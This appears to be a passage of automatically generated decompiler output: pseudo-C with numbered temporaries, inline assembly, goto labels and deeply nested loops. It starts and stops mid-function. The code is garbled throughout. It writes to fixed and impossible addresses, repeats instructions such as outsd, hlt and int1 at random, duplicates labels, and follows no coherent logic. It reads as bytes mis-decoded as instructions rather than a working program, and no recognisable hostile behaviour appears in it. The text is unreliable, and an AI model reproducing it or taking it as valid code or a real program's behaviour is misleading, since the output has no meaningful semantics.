                                  																																_t563 = _t563 +  *((intOrPtr*)(_t590 + _t369));
                                  																																if(_t563 < 0) {
                                  																																	continue;
                                  																																} else {
                                  																																	 *_t369 =  *_t369 + _t369;
                                  																																	_pop(es);
                                  																																	 *_t590 =  *_t590 - _t534;
                                  																																	 *_t534 =  *_t534 + _t563;
                                  																																	_pop(es);
                                  																																	_t534 = _t534 ^ _t597;
                                  																																	_t525 = (_t369 + 0x00000008 |  *_t605) -  *(_t369 + 0x00000008 |  *_t605);
                                  																																	 *_t525 =  *_t525 + _t525;
                                  																																	asm("adc esi, [eax]");
                                  																																	 *_t525 =  *_t525 + _t525;
                                  																																	_t353 = _t525 -  *_t525;
                                  																																	break;
                                  																																}
                                  																															}
                                  																														}
                                  																														L85:
                                  																														 *_t369 =  *_t369 + _t369;
                                  																														_t605[0x844000] = _t605[0x844000] + _t590;
                                  																														 *((intOrPtr*)(_t534 + _t369)) =  *((intOrPtr*)(_t534 + _t369)) - _t369;
                                  																														 *_t605 =  *_t605 + _t369;
                                  																														asm("outsd");
                                  																														 *0x750a0002 = _t369;
                                  																														asm("aad 0x0");
                                  																														 *_t590 =  *_t590 + _t369;
                                  																														_push(es);
                                  																														asm("outsd");
                                  																														_push(_t534);
                                  																														_push(es);
                                  																														asm("outsd");
                                  																														_push(_t534);
                                  																														_t375 = (_t369 |  *_t605) - 0x14 + 0x74c51200 -  *((intOrPtr*)((_t369 |  *_t605) - 0x14 + 0x74c51200));
                                  																														 *_t534 =  *_t534 + _t590;
                                  																														 *_t563 =  *_t563 ^ _t375;
                                  																														 *0xb5000000 =  *0xb5000000 + _t534;
                                  																														 *_t375 =  *_t375 + _t375;
                                  																														asm("adc [edx], eax");
                                  																														 *((intOrPtr*)(_t534 + _t375)) =  *((intOrPtr*)(_t534 + _t375)) - _t375;
                                  																														 *_t605 =  *_t605 + _t375;
                                  																														asm("outsd");
                                  																														 *0x750a0002 = _t375;
                                  																														asm("aam 0x0");
                                  																														 *_t590 =  *_t590 + _t375;
                                  																														asm("outsd");
                                  																														_t616 = _t612 - 1;
                                  																														_t379 = (_t375 |  *_t605) - 7 + 0x142a0600 -  *((intOrPtr*)((_t375 |  *_t605) - 7 + 0x142a0600));
                                  																														 *_t379 =  *_t379 + _t379;
                                  																														asm("sbb esi, [eax]");
                                  																														_t380 = _t379 +  *_t379;
                                  																														 *_t380 =  *_t380 - _t380;
                                  																														 *_t380 =  *_t380 + _t380;
                                  																														 *_t563 =  *_t563 + _t590;
                                  																														_t381 = _t380 & 0x00000003;
                                  																														 *_t605 =  *_t605 + _t381;
                                  																														asm("outsd");
                                  																														 *0x740a0002 = _t381;
                                  																														asm("aam 0x0");
                                  																														 *_t590 =  *_t590 + _t381;
                                  																														asm("outsd");
                                  																														 *[cs:eax+0x6f] =  *[cs:eax+0x6f] + _t590;
                                  																														_t383 = es;
                                  																														_t567 = _t563 +  *_t380 +  *_t590;
                                  																														asm("fiadd word [eax]");
                                  																														_push(es);
                                  																														_t386 = _t383 + 0xde0a0600 -  *_t567;
                                  																														 *_t386 =  *_t386 + _t386;
                                  																														 *_t386 =  *_t386 + _t386;
                                  																														 *0xFFFFFFFFFFFFFFFF =  *((intOrPtr*)(0xffffffffffffffff)) + _t386;
                                  																														_t387 = _t386 &  *_t386;
                                  																														_t619 = _t618 +  *0x13010000;
                                  																														 *(_t387 + _t387) =  *(_t387 + _t387) ^ _t387;
                                  																														asm("adc al, [ecx]");
                                  																														 *_t387 =  *_t387 + _t387;
                                  																														 *0x2110000 =  *0x2110000 - _t567;
                                  																														_push(es);
                                  																														 *_t597 =  *_t597 - _t567;
                                  																														 *_t590 =  *_t590 + _t567;
                                  																														ss = es;
                                  																														 *_t605 =  *_t605 - _t567;
                                  																														_push(es);
                                  																														 *0x2110000 =  *0x2110000 - _t567;
                                  																														_push(es);
                                  																														 *0x04220000 =  *((intOrPtr*)(0x4220000)) + _t590;
                                  																														 *0x2110000 =  *0x2110000 + _t567;
                                  																														_t400 = (0x02110000 +  *0x2110000 - 0x022a1702 +  *((intOrPtr*)(0x2110000 +  *0x2110000 - 0x22a1702)) + 0x0000006f ^  *_t590) - 0x00000002 -  *_t590 +  *((intOrPtr*)((0x02110000 +  *0x2110000 - 0x022a1702 +  *((intOrPtr*)(0x2110000 +  *0x2110000 - 0x22a1702)) + 0x0000006f ^  *_t590) - 2 -  *_t590)) +  *((intOrPtr*)((0x02110000 +  *0x2110000 - 0x022a1702 +  *((intOrPtr*)(0x2110000 +  *0x2110000 - 0x22a1702)) + 0x0000006f ^  *_t590) - 2 -  *_t590 +  *((intOrPtr*)((0x02110000 +  *0x2110000 - 0x022a1702 +  *((intOrPtr*)(0x2110000 +  *0x2110000 - 0x22a1702)) + 0x0000006f ^  *_t590) - 2 -  *_t590)))) - 0x0000000e +  *0x2110000 ^ 0x00000003;
                                  																														 *_t605 =  *_t605 + _t400;
                                  																														_push(ss);
                                  																														_t568 = _t567 +  *0x2110000;
                                  																														asm("das");
                                  																														_push(es);
                                  																														_t404 = _t400 -  *_t567 - 0xf +  *((intOrPtr*)(_t400 -  *_t567 - 0xf)) + 0x6f;
                                  																														if(_t404 <= 0) {
                                  																															 *_t590 =  *_t590 + _t568;
                                  																														}
                                  																														_pop(ss);
                                  																														_t592 = _t590 -  *_t605;
                                  																														 *_t605 =  *_t605 - _t568;
                                  																														 *_t605 =  *_t605 + _t592;
                                  																														asm("outsd");
                                  																														_t547 = es;
                                  																														 *_t597 =  *_t597 & _t592;
                                  																														_pop(es);
                                  																														 *_t547 =  *_t547 ^ 0x00000002;
                                  																														_push(ss);
                                  																														_push(_t619);
                                  																														_t413 = (_t404 |  *_t592) +  *(_t404 |  *_t592) + 0x70b0612 -  *_t597 - 0x2e180658 +  *_t547 + 0x00000028 ^  *_t547;
                                  																														 *_t605 =  *_t605 + _t413;
                                  																														_t414 = _t413 - 0x4a;
                                  																														_t569 = _t568 +  *_t414;
                                  																														_push(es);
                                  																														asm("sbb [esi+edx], al");
                                  																														asm("outsd");
                                  																														 *_t605 =  *_t605 - _t569;
                                  																														_t417 = _t414 +  *[cs:eax] + 0x2260600 +  *((intOrPtr*)(_t414 +  *[cs:eax] + 0x2260600));
                                  																														_push(es);
                                  																														 *_t592 =  *_t592 & _t417;
                                  																														 *_t417 =  *_t417 + _t417;
                                  																														 *((intOrPtr*)(_t605 + _t592)) =  *((intOrPtr*)(_t605 + _t592)) + _t417;
                                  																														while(1) {
                                  																															L88:
                                  																															asm("outsd");
                                  																															_t603 = ss;
                                  																															_t418 = _t417 + 0x2260600;
                                  																															 *_t418 =  *_t418 - _t569;
                                  																															_push(es);
                                  																															_t421 = _t418 +  *_t418 - 0xe +  *((intOrPtr*)(_t418 +  *_t418 - 0xe));
                                  																															 *((intOrPtr*)(_t421 + _t421)) =  *((intOrPtr*)(_t421 + _t421)) + _t592;
                                  																															 *_t421 =  *_t421 + _t569;
                                  																															_t422 = _t421 ^ 0x00000003;
                                  																															 *_t605 =  *_t605 + _t422;
                                  																															_t423 = _t422 -  *_t569;
                                  																															do {
                                  																																_push(ss);
                                  																																_t424 = _t423 - 0xf;
                                  																																_t570 = _t569 +  *_t424;
                                  																																asm("das");
                                  																																_push(es);
                                  																																_t426 = _t424 +  *_t424 + 0x6f;
                                  																																if(_t426 <= 0) {
                                  																																	 *_t592 =  *_t592 + _t570;
                                  																																}
                                  																																_pop(ss);
                                  																																asm("movsd");
                                  																																 *_t592 =  *_t592 + _t570;
                                  																																 *_t592 =  *_t592 + _t570;
                                  																																_t431 = (_t426 -  *0x7319492c +  *((intOrPtr*)(_t426 -  *0x7319492c)) |  *0x2a66f03) & 0x2a06f04;
                                  																																 *_t592 =  *_t592 + _t570;
                                  																																_t571 = _t570 - _t570;
                                  																																 *_t431 =  *_t431 + _t431;
                                  																																_t719 =  *_t431;
                                  																																do {
                                  																																	_push(es);
                                  																																} while (_t719 >= 0);
                                  																																_push(es);
                                  																																_t569 = _t571 & _t592;
                                  																																asm("int1");
                                  																																_t434 = _t431 +  *_t431 | 0x00000008;
                                  																																 *_t547 =  *_t547 - _t434;
                                  																																_t417 = _t434 +  *_t434;
                                  																																_push(es);
                                  																																asm("outsd");
                                  																																if((_t417 & 0x020a0002) != 0) {
                                  																																	goto L88;
                                  																																}
                                  																																 *_t417 =  *_t417 + _t417;
                                  																																_t435 = _t417 + 2;
                                  																																_t569 = _t569 +  *_t435;
                                  																																if(_t569 >= 0) {
                                  																																	L100:
                                  																																	_t593 = _t592 |  *_t603;
                                  																																	_t547 = _t547 - 1;
                                  																																	asm("sbb [ebx-0x5b], esi");
                                  																																	 *_t593 =  *_t593 + _t569;
                                  																																	_t439 = (_t435 +  *_t435 +  *((intOrPtr*)(_t435 +  *_t435)) |  *0x2a66f03) & 0x02a76f04;
                                  																																	 *_t593 =  *_t593 + _t569;
                                  																																} else {
                                  																																	goto L95;
                                  																																}
                                  																																L101:
                                  																																_t440 = _t439 & 0x02a86f15;
                                  																																 *_t593 =  *_t593 + _t569;
                                  																																_t572 = _t569 - _t569;
                                  																																 *_t440 =  *_t440 + _t440;
                                  																																_t728 =  *_t440;
                                  																																do {
                                  																																	_push(es);
                                  																																} while (_t728 >= 0);
                                  																																_push(es);
                                  																																_t569 = _t572 & _t593;
                                  																																asm("int1");
                                  																																_t443 = _t440 +  *_t440 | 0x00000008;
                                  																																 *_t547 =  *_t547 - _t443;
                                  																																_t439 = _t443 +  *_t443;
                                  																																_push(es);
                                  																																asm("outsd");
                                  																																if((_t439 & 0x020a0002) != 0) {
                                  																																	L97:
                                  																																	 *_t605 =  *_t605 + _t439;
                                  																																	_t593 = _t593 |  *(_t547 + _t569);
                                  																																	_push(es);
                                  																																	_t138 = _t593 + 0xa0a0002;
                                  																																	 *_t138 =  *((intOrPtr*)(_t593 + 0xa0a0002)) - _t569;
                                  																																	_push(es);
                                  																																	if( *_t138 == 0) {
                                  																																		 *_t439 =  *_t439 + _t439;
                                  																																		L99:
                                  																																		 *_t569 =  *_t569 + _t439;
                                  																																		_t445 = (_t439 |  *_t603) - 0xec2d0603;
                                  																																		_pop(es);
                                  																																		_t569 = _t569 - _t593;
                                  																																		 *_t445 =  *_t445 + _t445;
                                  																																		_push(es);
                                  																																		_t547[0x1bc28000] = _t547[0x1bc28000] - _t569;
                                  																																		asm("lodsb");
                                  																																		_t435 = _t445 +  *_t445;
                                  																																		_t592 = _t593 |  *_t603;
                                  																																		 *((intOrPtr*)(_t616 + 0x170a0002)) =  *((intOrPtr*)(_t616 + 0x170a0002)) - _t569;
                                  																																		goto L100;
                                  																																	}
                                  																																	goto L101;
                                  																																}
                                  																																 *_t439 =  *_t439 + _t439;
                                  																																_t446 = _t439 + 2;
                                  																																_t569 = _t569 +  *_t446;
                                  																																if(_t569 >= 0) {
                                  																																	L110:
                                  																																	_push(ss);
                                  																																	_t447 = _t446 -  *_t446;
                                  																																	 *_t447 =  *_t447 + _t447;
                                  																																	asm("adc esi, [eax]");
                                  																																	L111:
                                  																																	_t449 = _t447 +  *_t447 -  *((intOrPtr*)(_t447 +  *_t447));
                                  																																	 *_t449 =  *_t449 + _t449;
                                  																																	_t594 = 0x2110000;
                                  																																	 *((intOrPtr*)(_t547 + _t449)) =  *((intOrPtr*)(_t547 + _t449)) - _t449;
                                  																																	 *_t605 =  *_t605 + _t449;
                                  																																} else {
                                  																																	_t509 = _t446 +  *_t446;
                                  																																	while(1) {
                                  																																		_push(es);
                                  																																		asm("outsd");
                                  																																		_t603 = _t603 - 1;
                                  																																		_push(es);
                                  																																		_t439 = _t509 +  *_t509 -  *_t593;
                                  																																		ss = ss;
                                  																																		if(_t439 >= 0) {
                                  																																			goto L99;
                                  																																		}
                                  																																		 *_t439 =  *_t439 + _t439;
                                  																																		_t511 = _t439 + 0x17;
                                  																																		_t594 = _t593 -  *_t547;
                                  																																		 *_t569 =  *_t569 ^ _t569;
                                  																																		 *0x56000000 =  *0x56000000 + _t594;
                                  																																		 *_t511 =  *_t511 + _t511;
                                  																																		asm("adc [edx], edx");
                                  																																		 *_t569 = _t547 +  *_t569;
                                  																																		 *((intOrPtr*)(_t569 + 0x20a0001)) =  *((intOrPtr*)(_t569 + 0x20a0001)) - _t547;
                                  																																		 *_t605 =  *_t605 - _t569;
                                  																																		_push(es);
                                  																																		_t449 = _t511 +  *_t511 +  *((intOrPtr*)(_t594 + _t594));
                                  																																		 *_t594 = _t547 +  *_t594;
                                  																																		if( *_t594 > 0) {
                                  																																			 *_t449 =  *_t449 + _t449;
                                  																																			_t593 = _t594 |  *_t605;
                                  																																			 *_t569 =  *_t569 & _t449;
                                  																																			 *_t449 =  *_t449 + _t593;
                                  																																			 *_t605 =  *_t605 + _t593;
                                  																																			asm("outsd");
                                  																																			_pop(_t616);
                                  																																			_t509 = _t449 + 0xd2d0600;
                                  																																			_push(es);
                                  																																			_push(ss);
                                  																																			if(_t509 >= 0) {
                                  																																				continue;
                                  																																			} else {
                                  																																				 *_t509 = _t509 +  *_t509;
                                  																																				_t603 = _t603 - 1;
                                  																																				 *_t509 = _t509 +  *_t509;
                                  																																				_t569 = _t569 |  *_t509 |  *_t593;
                                  																																				goto L110;
                                  																																			}
                                  																																		}
                                  																																		goto L112;
                                  																																	}
                                  																																	goto L99;
                                  																																}
                                  																																L112:
                                  																																_push(es);
                                  																																asm("outsd");
                                  																																 *0x750a0002 = _t449;
                                  																																asm("aad 0x0");
                                  																																 *_t594 =  *_t594 + _t449;
                                  																																while(1) {
                                  																																	L113:
                                  																																	_t616 = _t616 + _t603[0x14];
                                  																																	asm("outsd");
                                  																																	_push(_t619);
                                  																																	_t454 = (_t449 |  *_t605) - 0x62a1402 + 0x70b0600 - 0x72a1402 + 0x2a0600;
                                  																																	while(1) {
                                  																																		 *_t454 =  *_t454 + _t454;
                                  																																		asm("adc esi, [eax]");
                                  																																		_t455 = _t454;
                                  																																		if (_t455 == 0) goto L115;
                                  																																		 *_t455 =  *_t455 + _t455;
                                  																																		 *_t455 =  *_t455 + _t455;
                                  																																		 *_t455 =  *_t455 + _t455;
                                  																																		_t569 = _t569 +  *_t455;
                                  																																		_t456 = _t455 & 0x00000003;
                                  																																		while(1) {
                                  																																			L116:
                                  																																			_push(es);
                                  																																			_t447 = _t456 +  *_t456 +  *0x33d07fe;
                                  																																			 *_t605 =  *_t605 + _t447;
                                  																																			if( *_t605 >= 0) {
                                  																																				goto L111;
                                  																																			}
                                  																																			_t569 = _t569 |  *(_t603 - 0x51);
                                  																																			_t460 = _t447 +  *_t447 +  *((intOrPtr*)(_t447 +  *_t447)) |  *_t594;
                                  																																			 *((intOrPtr*)(_t547 + _t460)) =  *((intOrPtr*)(_t547 + _t460)) - _t460;
                                  																																			 *_t605 =  *_t605 + _t460;
                                  																																			_t449 = _t460 +  *0x33e07fe;
                                  																																			 *_t605 =  *_t605 + _t449;
                                  																																			if( *_t605 >= 0) {
                                  																																				goto L113;
                                  																																			}
                                  																																			_t569 = _t569 |  *(_t603 - 0x4f);
                                  																																			_t463 = _t449 +  *_t449 +  *((intOrPtr*)(_t449 +  *_t449)) |  *_t594;
                                  																																			 *((intOrPtr*)(_t547 + _t463)) =  *((intOrPtr*)(_t547 + _t463)) - _t463;
                                  																																			 *_t605 =  *_t605 + _t463;
                                  																																			_t454 = _t463 +  *0x33b07fe;
                                  																																			 *_t605 =  *_t605 + _t454;
                                  																																			if( *_t605 >= 0) {
                                  																																				 *_t454 =  *_t454 + _t454;
                                  																																				asm("adc esi, [eax]");
                                  																																				_t455 = _t454;
                                  																																				if (_t455 == 0) goto L115;
                                  																																				 *_t455 =  *_t455 + _t455;
                                  																																				 *_t455 =  *_t455 + _t455;
                                  																																				 *_t455 =  *_t455 + _t455;
                                  																																				_t569 = _t569 +  *_t455;
                                  																																				_t456 = _t455 & 0x00000003;
                                  																																				continue;
                                  																																			}
                                  																																			_t573 = _t569 |  *(_t603 - 0x4d);
                                  																																			_t466 = _t454 +  *_t454 +  *((intOrPtr*)(_t454 +  *_t454)) |  *_t594;
                                  																																			 *((intOrPtr*)(_t547 + _t466)) =  *((intOrPtr*)(_t547 + _t466)) - _t466;
                                  																																			 *_t605 =  *_t605 + _t466;
                                  																																			if( *_t605 < 0) {
                                  																																				L123:
                                  																																				asm("outsd");
                                  																																				 *0x750a0002 = _t466;
                                  																																				asm("aam 0x0");
                                  																																				 *_t594 =  *_t594 + _t466;
                                  																																				asm("retf 0x0");
                                  																																				_t595 = _t594 |  *_t605;
                                  																																				asm("outsd");
                                  																																				asm("outsd");
                                  																																				_t574 = 2;
                                  																																				 *_t595 =  *_t595 + 2;
                                  																																				_t470 = (_t466 |  *_t605) - 0x7e062a01 + 0x030b0600 | 0x0000002b;
                                  																																				if(_t470 <= 0) {
                                  																																					goto L124;
                                  																																				}
                                  																																			} else {
                                  																																				 *[cs:eax+0x6f] =  *[cs:eax+0x6f] + _t594;
                                  																																				 *_t594 =  *_t594 + _t573;
                                  																																				_t594 = _t594 + 2;
                                  																																				asm("iretd");
                                  																																				 *2 =  *2 + 2;
                                  																																				_t574 = _t573 +  *2 - 1;
                                  																																				 *2 =  *2 + 2;
                                  																																				_t470 = 0x00000002 |  *_t594;
                                  																																				if(_t470 < 0) {
                                  																																					L124:
                                  																																					asm("outsd");
                                  																																					_t595 = 2;
                                  																																					 *2 =  *2 + _t574;
                                  																																					_t470 = _t470 | 0x0003f47e;
                                  																																				} else {
                                  																																					 *[cs:eax+0x73] =  *[cs:eax+0x73] + _t594;
                                  																																					asm("stc");
                                  																																					_t456 = _t470;
                                  																																					_push(es);
                                  																																					if(_t456 >= 0) {
                                  																																						continue;
                                  																																					} else {
                                  																																						 *_t456 =  *_t456 + _t456;
                                  																																						_t466 = _t456 + 0x2a;
                                  																																						asm("sbb esi, [eax]");
                                  																																						 *_t466 =  *_t466 | _t466;
                                  																																						 *_t466 =  *_t466 + _t466;
                                  																																						 *((intOrPtr*)(0x2110000 + _t466)) =  *((intOrPtr*)(0x2110000 + _t466)) - 2;
                                  																																						 *_t605 =  *_t605 + _t466;
                                  																																						goto L123;
                                  																																					}
                                  																																				}
                                  																																			}
                                  																																			_t473 = _t470 +  *_t470 + 0x2d - 1;
                                  																																			 *_t473 =  *_t473 & _t473;
                                  																																			 *_t473 =  *_t473 + _t473;
                                  																																			 *((intOrPtr*)(_t595 + 0x73)) =  *((intOrPtr*)(_t595 + 0x73)) + _t595;
                                  																																			asm("das");
                                  																																			 *((intOrPtr*)(_t473 + 0x14)) =  *((intOrPtr*)(_t473 + 0x14)) + _t595;
                                  																																			asm("rcl byte [edx], 1");
                                  																																			 *_t595 =  *_t595 + _t473;
                                  																																			 *((intOrPtr*)(_t574 + 1)) =  *((intOrPtr*)(_t574 + 1)) - _t574;
                                  																																			 *_t595 =  *_t595 + _t574;
                                  																																			asm("sbb [ebp+0x1000157], ecx");
                                  																																			_t474 = _t473 & 0x28141616;
                                  																																			 *_t595 =  *_t595 + _t574;
                                  																																			 *0x14171725 = _t474;
                                  																																			 *((intOrPtr*)(_t603 - 0x5df5fffe)) =  *((intOrPtr*)(_t603 - 0x5df5fffe)) - _t595;
                                  																																			_t475 = _t474 & 0x28141718;
                                  																																			_t549 = 2;
                                  																																			 *_t595 =  *_t595 + _t574;
                                  																																			 *0x2b828 = _t475;
                                  																																			asm("hlt");
                                  																																			asm("hlt");
                                  																																			_t596 = 0x7e0a0002;
                                  																																			asm("hlt");
                                  																																			 *(_t603 - 0x45) =  *(_t603 - 0x45) | _t616;
                                  																																			_t482 = _t475 +  *_t475 + 0x7e +  *((intOrPtr*)(_t475 +  *_t475 + 0x7e)) + 0x7b +  *((intOrPtr*)(_t475 +  *_t475 + 0x7e +  *((intOrPtr*)(_t475 +  *_t475 + 0x7e)) + 0x7b)) + 7 +  *((intOrPtr*)(_t475 +  *_t475 + 0x7e +  *((intOrPtr*)(_t475 +  *_t475 + 0x7e)) + 0x7b +  *((intOrPtr*)(_t475 +  *_t475 + 0x7e +  *((intOrPtr*)(_t475 +  *_t475 + 0x7e)) + 0x7b)) + 7));
                                  																																			asm("outsd");
                                  																																			asm("outsd");
                                  																																			 *((intOrPtr*)(2 + _t605)) =  *((intOrPtr*)(2 + _t605)) + _t482;
                                  																																			_t578 = 0x800a0002 |  *0x800a0002 |  *0x80ade81;
                                  																																			do {
                                  																																				_t579 = _t578 |  *_t482;
                                  																																				_t483 = _t482 - 6;
                                  																																				_t603[0x1a] = _t603[0x1a] | _t579;
                                  																																				 *_t483 =  *_t483 + _t483;
                                  																																				_t549 = _t549 | _t483;
                                  																																				_t484 = _t483 -  *_t483;
                                  																																				 *((intOrPtr*)(_t484 + _t484)) =  *((intOrPtr*)(_t484 + _t484)) + _t579;
                                  																																				 *_t596 =  *_t596 + _t484;
                                  																																				 *_t579 =  *_t579 + _t579;
                                  																																				 *((intOrPtr*)(_t549 + 0xa00ac)) =  *((intOrPtr*)(_t549 + 0xa00ac)) + _t484;
                                  																																				 *_t484 =  *_t484 + _t484;
                                  																																				 *_t549 = _t596 +  *_t549;
                                  																																				 *_t549 =  *_t549 ^ _t484;
                                  																																				_t596 = _t596 + _t579;
                                  																																				 *_t484 =  *_t484 + _t484;
                                  																																				 *((intOrPtr*)(_t484 + _t484 + 0x28021100)) =  *((intOrPtr*)(_t484 + _t484 + 0x28021100)) + _t549;
                                  																																				while(1) {
                                  																																					 *((intOrPtr*)(_t549 + _t484)) =  *((intOrPtr*)(_t549 + _t484)) - _t484;
                                  																																					 *_t605 =  *_t605 + _t484;
                                  																																					asm("outsd");
                                  																																					while(1) {
                                  																																						L128:
                                  																																						 *0x750a0002 = _t484;
                                  																																						asm("aam 0x0");
                                  																																						 *_t596 =  *_t596 + _t484;
                                  																																						_t486 = (_t484 |  *_t605) - 0x62a1602;
                                  																																						asm("outsd");
                                  																																						_push(_t486);
                                  																																						_t484 = _t486 + 0x70b0600 - 0x72a1602;
                                  																																						if(_t484 != 0) {
                                  																																							break;
                                  																																						}
                                  																																						 *_t484 =  *_t484 + _t484;
                                  																																						_t579 = _t579 +  *((intOrPtr*)(_t596 + _t484));
                                  																																						_pop(ss);
                                  																																						_t484 = _t484 -  *_t603;
                                  																																						if(_t484 != 0) {
                                  																																							continue;
                                  																																						}
                                  																																						 *_t484 =  *_t484 + _t484;
                                  																																						_t580 = _t579 +  *((intOrPtr*)(_t484 + _t579));
                                  																																						_t603[0x15] = _t603[0x15] | _t580;
                                  																																						_t489 = _t484 - 0xd + 0x41280600;
                                  																																						 *_t489 =  *_t489 + _t489;
                                  																																						_push(ss);
                                  																																						_t582 = (_t580 |  *(_t596 + _t489)) -  *_t489;
                                  																																						asm("outsd");
                                  																																						_push(_t605);
                                  																																						_t482 = _t489 + 0x280d0600;
                                  																																						if(_t482 >= 0) {
                                  																																							 *_t596 =  *_t596 + _t582;
                                  																																						}
                                  																																						goto L132;
                                  																																					}
                                  																																					 *((intOrPtr*)(_t549 + _t484)) =  *((intOrPtr*)(_t549 + _t484)) - _t484;
                                  																																					 *_t605 =  *_t605 + _t484;
                                  																																					asm("outsd");
                                  																																					goto L128;
                                  																																				}
                                  																																				L132:
                                  																																				_t578 = _t582 |  *_t582;
                                  																																			} while (_t578 < 0);
                                  																																			asm("das");
                                  																																			_t482[0x1b] = _t596 + _t482[0x1b];
                                  																																			while(1) {
                                  																																				L134:
                                  																																				asm("outsd");
                                  																																				asm("outsb");
                                  																																				_t482[0] = _t482[0] - _t596;
                                  																																				 *_t596 =  *_t596 + _t578;
                                  																																				 *(_t596 - 0x73) =  *(_t596 - 0x73) | 0x2c0a0002;
                                  																																				asm("das");
                                  																																				_t482[0x1b] = _t596 + _t482[0x1b];
                                  																																				_t608 = 0x2c0a0002;
                                  																																				_t482[0] = _t482[0] - _t596;
                                  																																				 *_t596 =  *_t596 + _t578;
                                  																																				while(1) {
                                  																																					 *(_t596 - 0x61) =  *(_t596 - 0x61) | _t608;
                                  																																					asm("das");
                                  																																					_t482[0x1b] = _t596 + _t482[0x1b];
                                  																																					_t596 = _t596 - 1;
                                  																																					_t482[0] = _t482[0] - _t596;
                                  																																					 *_t596 =  *_t596 + _t578;
                                  																																					 *(_t596 - 0x53) =  *(_t596 - 0x53) | 0x2c0a0002;
                                  																																					asm("das");
                                  																																					_t482[0x1b] = _t596 + _t482[0x1b];
                                  																																					while(1) {
                                  																																						L136:
                                  																																						_t482 = _t482 +  *_t482;
                                  																																						_t583 = _t578 |  *(_t482 + _t603);
                                  																																						_t482[0] = _t482[0] - _t596;
                                  																																						 *_t596 =  *_t596 + _t583;
                                  																																						_t578 = _t583 |  *_t583;
                                  																																						if(_t578 < 0) {
                                  																																							goto L134;
                                  																																						}
                                  																																						asm("das");
                                  																																						_t482[0x1b] = _t596 + _t482[0x1b];
                                  																																						_t608 = 0x2c0a0002;
                                  																																						 *[es:eax+0x1] =  *[es:eax+0x1] - _t596;
                                  																																						 *_t596 =  *_t596 + _t578;
                                  																																						_t217 = _t596 - 0x39;
                                  																																						 *_t217 =  *(_t596 - 0x39) | 0x2c0a0002;
                                  																																						_t763 =  *_t217;
                                  																																						L140:
                                  																																						while(_t763 >= 0) {
                                  																																							asm("das");
                                  																																							_t219 =  &(_t482[0x1b]);
                                  																																							 *_t219 = _t596 + _t482[0x1b];
                                  																																							asm("adc al, 0x28");
                                  																																							if( *_t219 >= 0) {
                                  																																								 *_t596 =  *_t596 + _t578;
                                  																																							}
                                  																																							_t578 = _t578 |  *_t578;
                                  																																							if(_t578 < 0) {
                                  																																								L136:
                                  																																								_t482 = _t482 +  *_t482;
                                  																																								_t583 = _t578 |  *(_t482 + _t603);
                                  																																								_t482[0] = _t482[0] - _t596;
                                  																																							}
                                  																																							asm("das");
                                  																																							_t482[0x1b] = _t596 + _t482[0x1b];
                                  																																							while(1) {
                                  																																								_t608 = 0x160a0002;
                                  																																								 *_t578 =  *_t578 + 1;
                                  																																								_t596 = _t596 -  *_t603;
                                  																																								_t490 = _t482 -  *_t482;
                                  																																								 *_t549 = _t596 +  *_t549;
                                  																																								 *_t549 =  *_t549 ^ _t490;
                                  																																								 *((intOrPtr*)(_t578 + _t490)) =  *((intOrPtr*)(_t578 + _t490)) + _t596;
                                  																																								 *_t490 =  *_t490 + _t490;
                                  																																								 *_t490 =  *_t490 + _t490;
                                  																																								while(1) {
                                  																																									L146:
                                  																																									 *_t490 =  *_t490 + _t490;
                                  																																									_t603 = _t603 +  *_t578;
                                  																																									_t491 = _t490 ^ 0x02000001;
                                  																																									while(1) {
                                  																																										L148:
                                  																																										_t482 = _t494 +  *0x33b07fe;
                                  																																										 *_t608 =  *_t608 + _t482;
                                  																																										if( *_t608 >= 0) {
                                  																																											goto L140;
                                  																																										}
                                  																																										_t578 = _t578 |  *(_t603 - 0x41);
                                  																																										_t497 = _t482 +  *_t482 +  *(_t482 +  *_t482) |  *_t596;
                                  																																										 *((intOrPtr*)(_t549 + _t497)) =  *((intOrPtr*)(_t549 + _t497)) - _t497;
                                  																																										 *_t608 =  *_t608 + _t497;
                                  																																										_t498 = _t497 +  *0x33c07fe;
                                  																																										_pop(es);
                                  																																										_t482 = _t498 +  *_t498;
                                  																																										_push(es);
                                  																																										if(_t482 >= 0) {
                                  																																											_t608 = 0x160a0002;
                                  																																											 *_t578 =  *_t578 + 1;
                                  																																											_t596 = _t596 -  *_t603;
                                  																																											_t490 = _t482 -  *_t482;
                                  																																											 *_t549 = _t596 +  *_t549;
                                  																																											 *_t549 =  *_t549 ^ _t490;
                                  																																											 *((intOrPtr*)(_t578 + _t490)) =  *((intOrPtr*)(_t578 + _t490)) + _t596;
                                  																																											 *_t490 =  *_t490 + _t490;
                                  																																											 *_t490 =  *_t490 + _t490;
                                  																																											while(1) {
                                  																																												L146:
                                  																																												 *_t490 =  *_t490 + _t490;
                                  																																												_t603 = _t603 +  *_t578;
                                  																																												_t491 = _t490 ^ 0x02000001;
                                  																																												L147:
                                  																																												_t492 = _t491 & 0x00000003;
                                  																																												 *_t608 =  *_t608 + _t492;
                                  																																												_t493 = _t492 - 0x60;
                                  																																												_t578 = _t578 +  *_t491 +  *_t493;
                                  																																												_t494 = _t493 & 0x00000003;
                                  																																												 *_t608 =  *_t608 + _t494;
                                  																																												goto L148;
                                  																																											}
                                  																																										}
                                  																																										_t499 = _t482 +  *_t482;
                                  																																										 *_t596 =  *_t596 + _t578;
                                  																																										asm("outsd");
                                  																																										_t603 = 0x20a0002;
                                  																																										 *((intOrPtr*)(_t549 + _t499)) =  *((intOrPtr*)(_t549 + _t499)) - _t499;
                                  																																										 *_t608 =  *_t608 + _t499;
                                  																																										_t490 = _t499 +  *0x33e07fe;
                                  																																										 *_t608 =  *_t608 + _t490;
                                  																																										if ( *_t608 >= 0) goto L146;
                                  																																									}
                                  																																									goto L140;
                                  																																								}
                                  																																							}
                                  																																						}
                                  																																						 *(_t596 - 0x61) =  *(_t596 - 0x61) | _t608;
                                  																																						asm("das");
                                  																																						_t482[0x1b] = _t596 + _t482[0x1b];
                                  																																						_t596 = _t596 - 1;
                                  																																						_t482[0] = _t482[0] - _t596;
                                  																																						 *_t596 =  *_t596 + _t578;
                                  																																						 *(_t596 - 0x53) =  *(_t596 - 0x53) | 0x2c0a0002;
                                  																																						asm("das");
                                  																																						_t482[0x1b] = _t596 + _t482[0x1b];
                                  																																					}
                                  																																				}
                                  																																			}
                                  																																		}
                                  																																		goto L111;
                                  																																	}
                                  																																}
                                  																																L95:
                                  																																_push(es);
                                  																																asm("outsd");
                                  																																_t603 = _t603 - 1;
                                  																																_push(es);
                                  																																_push(ss);
